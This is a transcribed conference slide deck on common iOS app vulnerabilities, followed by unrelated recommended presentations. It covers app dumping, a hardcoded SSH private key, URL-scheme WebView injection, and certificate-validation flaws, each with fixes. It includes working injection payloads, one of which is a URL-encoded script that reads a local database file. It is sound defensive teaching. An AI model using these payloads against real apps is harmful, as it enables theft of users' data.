common vulnerabilities on ios apps
play

Common Vulnerabilities on iOS Apps by ivan r QconSF @ivRodriguezCA - PowerPoint PPT Presentation

Oct 17, 2023 •347 likes •1.18k views

Common Vulnerabilities on iOS Apps by ivan r QconSF @ivRodriguezCA @ivRodriguezCA DISCLAIMER the views and opinions expressed on this talk are solely my own and do not reflect the views or opinions of my employer. @ivRodriguezCA

  1. Common Vulnerabilities on iOS Apps by ivan r QconSF @ivRodriguezCA

  2. @ivRodriguezCA

  3. DISCLAIMER the views and opinions expressed on this talk are solely my own and do not reflect the views or opinions of my employer. @ivRodriguezCA

  4. ivan_rodriguez.me • security researcher and software engineer • focused on iOS reverse engineering and mobile bug bounty programs • i blog at ivrodriguez.com • find me on twitter: @ivRodriguezCA • find me on github: /ivRodriguezCA @ivRodriguezCA

  5. agenda • reverse engineering an iOS app. • tools and methods. • common iOS vulnerabilities (all found on real world applications). • how to fix and prevent these vulnerabilities. • resources / conclusions. • questions. @ivRodriguezCA

  6. reverse engineering an iOS app • iOS apps are encrypted with an algorithm called FairPlay. • we need a jailbroken device. • we don’t “decrypt” the apps, we just dump them from memory. • transfer them to a desktop where we do the reverse engineering. @ivRodriguezCA

  7. reverse engineering an iOS app • how we dump the app from memory? > dump memory <filename> <start_address> <end_address> @ivRodriguezCA

  8. reverse engineering an iOS app • how we dump the app from memory? > dump memory <filename> <start_address> <end_address> • we can use tools to automate this. @ivRodriguezCA

  9. reverse engineering an iOS app • some of the tools we can use: - dumpdecrypted: https://github.com/stefanesser/dumpdecrypted - bfinject: https://github.com/BishopFox/bfinject - frida-ios-dump: https://github.com/AloneMonkey/frida-ios-dump @ivRodriguezCA

  10. reverse engineering an iOS app @ivRodriguezCA

  11. reverse engineering an iOS app @ivRodriguezCA

  12. reverse engineering an iOS app @ivRodriguezCA

  13. reverse engineering an iOS app • dynamic and static analysis @ivRodriguezCA

  14. reverse engineering an iOS app • dynamic and static analysis @ivRodriguezCA

  15. reverse engineering an iOS app • dynamic and static analysis @ivRodriguezCA

  16. vulnerability # 1 • searching through embedded files within the app @ivRodriguezCA

  17. vulnerability # 1 @ivRodriguezCA

  18. vulnerability # 1 private_key @ivRodriguezCA

  19. vulnerability # 1 private_key yes, PRIVATE key @ivRodriguezCA

  20. vulnerability # 1 cloud server @ivRodriguezCA

  21. vulnerability # 1 cloud server @ivRodriguezCA

  22. vulnerability # 1 cloud server @ivRodriguezCA

  23. vulnerability # 1 cloud server ssh @ivRodriguezCA

  24. vulnerability # 1 cloud server  ssh @ivRodriguezCA

  25. how to fix vulnerability # 1 cloud server own server @ivRodriguezCA

  26. how to fix vulnerability # 1 cloud server own server @ivRodriguezCA

  27. how to fix vulnerability # 1 cloud server own server @ivRodriguezCA

  28. how to fix vulnerability # 1 cloud server own server @ivRodriguezCA

  29. how to fix vulnerability # 1 cloud server own server public api @ivRodriguezCA

  30. how to fix vulnerability # 1 cloud server own server ssh @ivRodriguezCA

  31. how to fix vulnerability # 1 cloud server own server ssh @ivRodriguezCA

  32. vulnerability # 2 @ivRodriguezCA

  33. vulnerability # 2 @ivRodriguezCA

  34. vulnerability # 2 @ivRodriguezCA

  35. vulnerability # 2 @ivRodriguezCA

  36. vulnerability # 2 @ivRodriguezCA

  37. @ivRodriguezCA

  38. vulnerability # 2 • coinza://news/<trusted-html> @ivRodriguezCA

  39. vulnerability # 2 • coinza://news/<trusted-html> - <html><body><script>document.location = ‘https://en.wikipedia.org/ wiki/URL_redirection’;</script></body></html> • @ivRodriguezCA

  40. vulnerability # 2 • coinza://news/<trusted-html> - <html><body><script>document.location = ‘https://en.wikipedia.org/ wiki/URL_redirection’;</script></body></html> coinza://news/ %3Chtml%3E%3Cbody%3E%3Cscript%3Edocument.location%20%3D%20% 27https%3A%2F%2Fen.wikipedia.org%2Fwiki%2FURL_redirection%27%3B% 3C%2Fscript%3E%3C%2Fbody%3E%3C%2Fhtml%3E @ivRodriguezCA

  41. how to fix vulnerability # 2 @ivRodriguezCA

  42. how to fix vulnerability # 2  @ivRodriguezCA

  43. how to fix vulnerability # 2 • URL Schemes + WebViews are dangerous and you should be careful when you pair them. • don’t load HTML code from user-controlled content. • if you need to dynamically react to URL Schemes have a set of whitelisted actions. @ivRodriguezCA

  44. vulnerability # 3 @ivRodriguezCA

  45. vulnerability # 3 @ivRodriguezCA

  46. vulnerability # 3 @ivRodriguezCA

  47. vulnerability # 3 @ivRodriguezCA

  48. vulnerability # 3 @ivRodriguezCA

  49. vulnerability # 3 == ? @ivRodriguezCA

  50. vulnerability # 3 ✅ @ivRodriguezCA

  51. vulnerability # 3 🛒 @ivRodriguezCA

  52. vulnerability # 3 🚬 🛒 @ivRodriguezCA

  53. vulnerability # 3 ✅ 🛒 @ivRodriguezCA

  54. vulnerability # 3 website.com 🛒 @ivRodriguezCA

  55. vulnerability # 3 username/password 🛒 @ivRodriguezCA

  56. vulnerability # 3 🛒 @ivRodriguezCA

  57. @ivRodriguezCA

  58. vulnerability # 3 @ivRodriguezCA

  59. vulnerability # 3 detected connection to a website @ivRodriguezCA

  60. vulnerability # 3 creates fake TLS certificate @ivRodriguezCA

  61. vulnerability # 3 sniffs client traffic @ivRodriguezCA

  62. how to fix vulnerability # 3 • vet and test your 3rd party frameworks, specially if they handle your network requests. • be careful when implementing your own certificate validation logic. • if you want to implement HPKP you can use TrustKit: - https://github.com/datatheorem/TrustKit @ivRodriguezCA

  63. how to fix vulnerability # 3 source: https://cheatsheetseries.owasp.org/cheatsheets/Pinning_Cheat_Sheet.html @ivRodriguezCA

  64. vulnerability # 4 @ivRodriguezCA

  65. vulnerability # 4 @ivRodriguezCA

  66. vulnerability # 4 @ivRodriguezCA

  67. vulnerability # 4 @ivRodriguezCA

  68. vulnerability # 4 @ivRodriguezCA

  69. vulnerability # 4 • these methods are equivalent for local files @ivRodriguezCA

  70. vulnerability # 4 @ivRodriguezCA

  71. vulnerability # 4 file: sqlcipher.db path: Documents/ @ivRodriguezCA

  72. vulnerability # 4 send file to a remote location. @ivRodriguezCA

  73. vulnerability # 4 • coinza://news/ %3Chtml%3E%0A%20%20%20%3Cbody%3E%0A%20%20%20%20%20%20%3Cscript%3E%0A%20%20%20%20%20%20%20%20%20function%20loa dFile%28%29%20%7B%0A%20%20%20%20%20%20%20%20%20%20%20%20var%20xmlhttp%20%3D%20new%20XMLHttpRequest%28%29%3B%0 A%20%20%20%20%20%20%20%20%20%20%20%20documentsPath%20%3D%20document.URL.split%28%27%2F%27%29.slice%280%2C%20-1%29.j oin%28%27%2F%27%29%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20filePath%20%3D%20documentsPath%20%2B%20%27%2F%27% 20%2B%20%27sqlcipher.db%27%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20xmlhttp.onreadystatechange%20%3D%20function%28%2 9%20%7B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28xmlhttp.readyState%20%3D%3D%204%29%20%7B%0A%20 %20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28xmlhttp.responseText.length%20%3E%200%29%20%7B%0A%20%2 0%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20alert%28%27Got%20file%20%5C%27sqlcipher.db%5C%27%2C%20size %3A%20%27%20%2B%20xmlhttp.responseText.length%29%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7 D%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%0A%20%20%20%20%20%20%20%20%20%20%20%20%7D%3B%0A%2 0%20%20%20%20%20%20%20%20%20%20%20xmlhttp.onerror%20%3D%20function%28%29%20%7B%0A%20%20%20%20%20%20%20%20%20%2 0%20%20%20%20%20alert%28%27Error%21%20%27%20%2B%20filePath%29%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%7D%0A %20%20%20%20%20%20%20%20%20%20%20%20xmlhttp.open%28%27GET%27%2C%20filePath%2C%20true%29%3B%0A%20%20%20%20%20%2 0%20%20%20%20%20%20xmlhttp.send%28%29%3B%0A%20%20%20%20%20%20%20%20%20%7D%0A%20%20%20%20%20%20%20%20%20wind ow.onload%20%3D%20loadFile%3B%0A%20%20%20%20%20%20%3C%2Fscript%3E%0A%20%20%20%20%20%20%3Cp%3E%0A%20%20%20%20% 20%20%20%20%20Hello%20World%0A%20%20%20%20%20%20%3C%2Fp%3E%0A%20%20%20%3C%2Fbody%3E%0A%3C%2Fhtml%3E @ivRodriguezCA

  74. @ivRodriguezCA

  75. how to fix vulnerability # 4 • do not use UIWebView anymore, use WKWebView instead. • if you absolutely have to use UIWebView: - do not use - (void)loadRequest:(NSURLRequest *)request for local files. - Use - (void)loadHTMLString:(NSString *)string baseURL:(NSURL *)baseURL with an URL object created with [URLWithString:@“about:blank”] . - @ivRodriguezCA

  76. conclusions • add security assessments to your release cycles. • keep your 3rd party libraries up to date. • be careful copy-pasting code from online sources. • have a public bounty program or at least public channels for responsible disclosures. @ivRodriguezCA

  77. resources • OWASP - Mobile Application Security Verification Standard 
 https://github.com/OWASP/owasp-masvs • OWASP - The Mobile Security Testing Guide 
 https://github.com/OWASP/owasp-mstg • Resources Page of my course 
 https://github.com/ivRodriguezCA/RE-iOS-Apps/blob/master/ Resources.md @ivRodriguezCA

Download Presentation
Download Policy: The content available on the website is offered to you 'AS IS' for your personal information and use only. It cannot be commercialized, licensed, or distributed on other websites without prior consent from the author. To download a presentation, simply click this link. If you encounter any difficulties during the download process, it's possible that the publisher has removed the file from their server.

Recommend

vulnerabilities CVE, Common Vulnerabilities and Exposures CWE, Common Weakness Enumeration

vulnerabilities CVE, Common Vulnerabilities and Exposures CWE, Common Weakness Enumeration

Security &amp; Knowledge Management a.a. 2019/20 There are a set of sources that provide updated information about security vulnerabilities CVE, Common Vulnerabilities and Exposures CWE, Common Weakness Enumeration CAPEC,

197 views • 8 slides
Typical vulnerabilities in Lightning Apps Igor Korsakov /

Typical vulnerabilities in Lightning Apps Igor Korsakov /

Typical vulnerabilities in Lightning Apps Igor Korsakov / bluewallet.io / Berlin / October, 2019 Plan 1. Double spends with hold-invoices; anatomy of sendPayment 2. Stealing free fees 3. Race-condition attacks

701 views • 20 slides
Common software vulnerabilities: causes and consequences Ricardo J. Rodrguez CUD

Common software vulnerabilities: causes and consequences Ricardo J. Rodrguez CUD

Common software vulnerabilities: causes and consequences Ricardo J. Rodrguez CUD rjrodriguez@unizar.es @RicardoJRdez 14 de marzo, 2019 I Jornadas OWASP ZGZ $whoami Ph.D. in Computer Sciences (University of Zaragoza, 2013)

611 views • 31 slides
WISTP 07 A comparative analysis of common threats, vulnerabilities, attacks and

WISTP 07 A comparative analysis of common threats, vulnerabilities, attacks and

WISTP 07 A comparative analysis of common threats, vulnerabilities, attacks and countermeasures within smart card and wireless sensor network node technologies. Kevin Eagles, Konstantinos Markantonakis and Keith Mayes Smart Card Centre,

337 views • 22 slides
Small Business Apps WHAT ARE MOBI LE APPS ? W h a t are mob i le apps ? A little bit of

Small Business Apps WHAT ARE MOBI LE APPS ? W h a t are mob i le apps ? A little bit of

WELCOME Small Business Apps WHAT ARE MOBI LE APPS ? W h a t are mob i le apps ? A little bit of information An App is a piece of so ware (a program) that needs to be installed on Mobile Apps are device specific, meaning that an App that runs

268 views • 12 slides
S MV -H UNTER : Large Scale, Automated Detection of SSL/TLS Man-in-the-Middle Vulnerabilities in

S MV -H UNTER : Large Scale, Automated Detection of SSL/TLS Man-in-the-Middle Vulnerabilities in

S MV -H UNTER : Large Scale, Automated Detection of SSL/TLS Man-in-the-Middle Vulnerabilities in Android Apps David Sounthiraraj Justin Sahs Garret Greenwood Zhiqiang Lin Latifur Khan University of Texas at Dallas February 26, 2014

671 views • 40 slides
HEV-E Hazards, Exposures and Vulnerabilities Explorer Dr. Giovanni Allegri Ing. Simone

HEV-E Hazards, Exposures and Vulnerabilities Explorer Dr. Giovanni Allegri Ing. Simone

HEV-E Hazards, Exposures and Vulnerabilities Explorer Dr. Giovanni Allegri Ing. Simone Giannecchini About Us Around since 2006 Expertise GeoSpatial Data Fusion, Web Mashups, Mobile Apps OGC, ISO, INSPIRE Standards

565 views • 30 slides
Boxing them in Buggy apps can crash other apps The Kernel App 1 App 2 App 3 Buggy apps can

Boxing them in Buggy apps can crash other apps The Kernel App 1 App 2 App 3 Buggy apps can

Boxing them in Buggy apps can crash other apps The Kernel App 1 App 2 App 3 Buggy apps can crash OS wants to be your friend Buggy apps can hog all resources Operating System Malicious apps can violate Reading and writing memory, privacy

548 views • 17 slides
F ROM WEBSITES TO APPS , AND NOW FROM APPS TO CHATBOTS ? A NTNIO B RANCO FROM APPS TO CHATBOTS

F ROM WEBSITES TO APPS , AND NOW FROM APPS TO CHATBOTS ? A NTNIO B RANCO FROM APPS TO CHATBOTS

F ROM WEBSITES TO APPS , AND NOW FROM APPS TO CHATBOTS ? A NTNIO B RANCO FROM APPS TO CHATBOTS CEO of large social network in annual development conference 2 months ago Shared vision for next 2 decades: past : with advent of PCs, companies

498 views • 14 slides
Static Detection and Automatic Exploitation of Intent Message Vulnerabilities in Android

Static Detection and Automatic Exploitation of Intent Message Vulnerabilities in Android

Static Detection and Automatic Exploitation of Intent Message Vulnerabilities in Android Applications Daniele Gallingani, Rigel Gjomemo , V.N. Venkatakrishnan, Stefano Zanero Android Message Passing Mechanism Android apps are composed of

566 views • 23 slides
The Kernel wants to be your friend Boxing them in Buggy apps can crash other apps App 1 App 2

The Kernel wants to be your friend Boxing them in Buggy apps can crash other apps App 1 App 2

The Kernel wants to be your friend Boxing them in Buggy apps can crash other apps App 1 App 2 App 3 Buggy apps can crash OS Buggy apps can hog all resources Operating System Malicious apps can violate Reading and writing memory, privacy

1.15k views • 67 slides
STROLLING INTO RING-0 via i/o kit drivers @patrickwardle WHOIS security for the 21st century

STROLLING INTO RING-0 via i/o kit drivers @patrickwardle WHOIS security for the 21st century

STROLLING INTO RING-0 via i/o kit drivers @patrickwardle WHOIS security for the 21st century leverages the best combination of humans and technology to discover security vulnerabilities in our customers web apps, mobile apps, IoT

648 views • 47 slides
By: Taylor Thomas &amp; Ashley Fischer There are apps for just about EVERYTHING! There are

By: Taylor Thomas &amp; Ashley Fischer There are apps for just about EVERYTHING! There are

By: Taylor Thomas &amp; Ashley Fischer There are apps for just about EVERYTHING! There are new apps being developed and posted everyday. Some of the best apps you will ever find are FREE! There are two ways to download apps for

606 views • 38 slides
CSE484/CSE584 BROWSER SECURITY AND WEB VULNERABILITIES Dr. Benjamin Livshits Taxonomy of XSS 2

CSE484/CSE584 BROWSER SECURITY AND WEB VULNERABILITIES Dr. Benjamin Livshits Taxonomy of XSS 2

CSE484/CSE584 BROWSER SECURITY AND WEB VULNERABILITIES Dr. Benjamin Livshits Taxonomy of XSS 2 XSS-0 : client-side XSS-1 : reflective XSS-2 : persistent XSS Is Exceedingly Common 3 Web Hacking Incident Database (1999 -

887 views • 44 slides
NECESSARY BACKGROUND ON MEMORY EXPLOITS AND WEB APPLICATION VULNERABILITIES Outline 2

NECESSARY BACKGROUND ON MEMORY EXPLOITS AND WEB APPLICATION VULNERABILITIES Outline 2

1 NECESSARY BACKGROUND ON MEMORY EXPLOITS AND WEB APPLICATION VULNERABILITIES Outline 2 Memory safety attacks Buffer overruns Format string vulnerabilities Web application vulnerabilities SQL injections Cross-site

901 views • 39 slides
Mitigating and Preventing Vulnerabilities with ELFbac Ira Ray Jenkins, Dartmouth College Funded

Mitigating and Preventing Vulnerabilities with ELFbac Ira Ray Jenkins, Dartmouth College Funded

Mitigating and Preventing Vulnerabilities with ELFbac Ira Ray Jenkins, Dartmouth College Funded by the U.S. Department of Energy and the U.S. Department of Homeland Security | cred-c.org Code to Process Common object file formats source

394 views • 14 slides
SIBUR FIELD TRIP: TOBOLSK PRODUCTION SITE 3-4 October 2013 DISCLAIMER The information contained

SIBUR FIELD TRIP: TOBOLSK PRODUCTION SITE 3-4 October 2013 DISCLAIMER The information contained

SIBUR FIELD TRIP: TOBOLSK PRODUCTION SITE 3-4 October 2013 DISCLAIMER The information contained herein pertaining to SIBUR (the &quot;Company&quot;) has been provided by the Company solely for use at this presentation. By attending this

601 views • 34 slides
Secure Web Application Development METHODOLOGIES AND AUTOMATED TOOLS MURAT KAYA SOFTWARE

Secure Web Application Development METHODOLOGIES AND AUTOMATED TOOLS MURAT KAYA SOFTWARE

Secure Web Application Development METHODOLOGIES AND AUTOMATED TOOLS MURAT KAYA SOFTWARE SECURITY SPECIALIST Agenda Software Security Overview Software Security Methodologies Security Test Methods Analysis Tools Tools

497 views • 25 slides
Ethical Hacking Finse 2019 Cyber Security Winter school Universitetet i Oslo Laszlo Erddi

Ethical Hacking Finse 2019 Cyber Security Winter school Universitetet i Oslo Laszlo Erddi

Ethical Hacking Finse 2019 Cyber Security Winter school Universitetet i Oslo Laszlo Erddi From Myself Associate Professor at UiO Teaching Ethical Hacking since 2012 Lecturer of the IN5290 Ethical Hacking at UiO Leader

878 views • 66 slides
The above pictures are from Jawalakhel, in front of a complex and opposite to Staff College. The

The above pictures are from Jawalakhel, in front of a complex and opposite to Staff College. The

Hacking Fiber optics easier than copper cable Sachin Jung Karki Freelance IT Security professional February 1, 2016 You know that your copper-wired networks and wireless LANs can be sniffed and that your data can be compromised. But fiber-optic

272 views • 6 slides
Multiple mating of female Dioryctria in British Columbia conifer seed orchards Jason Dombrowski

Multiple mating of female Dioryctria in British Columbia conifer seed orchards Jason Dombrowski

Multiple mating of female Dioryctria in British Columbia conifer seed orchards Jason Dombrowski Jason Dombrowski Caroline Whitehouse, Ward Strong and Maya Evenden Multiple mating theory Levels of polyandry can vary widely among and within

268 views • 16 slides
Dont Cut The Rotator Cuff: Maintain It, Repair In-Situ: Results are Spectacular Larry D.

Dont Cut The Rotator Cuff: Maintain It, Repair In-Situ: Results are Spectacular Larry D.

Dont Cut The Rotator Cuff: Maintain It, Repair In-Situ: Results are Spectacular Larry D. Field, M.D. Mississippi Sports Medicine and Orthopaedic Center Jackson, Mississippi Disclosures The following relationships exist: 1.Royalties

672 views • 22 slides
OIE standards related related to to OIE standards trade and and poultry poultry diseases

OIE standards related related to to OIE standards trade and and poultry poultry diseases

OIE standards related related to to OIE standards trade and and poultry poultry diseases diseases trade Poultry in the 21 st Century Bangkok, 5-7 November 2007 Dr Christianne Bruschke Scientific and Technical Department OIE Standards for

186 views • 14 slides
KOALAS IN THE WIDE BAY BURNETT Wildcare Australia &amp; Wildlife Rescue Fraser Coast Joint

KOALAS IN THE WIDE BAY BURNETT Wildcare Australia &amp; Wildlife Rescue Fraser Coast Joint

KOALAS IN THE WIDE BAY BURNETT Wildcare Australia &amp; Wildlife Rescue Fraser Coast Joint Presentation Our organisations Overview of Rehabilitation Causes and Issues Statistics on Koala Rescues in Wide Bay Burnett / BMRG Region

710 views • 70 slides

More recommend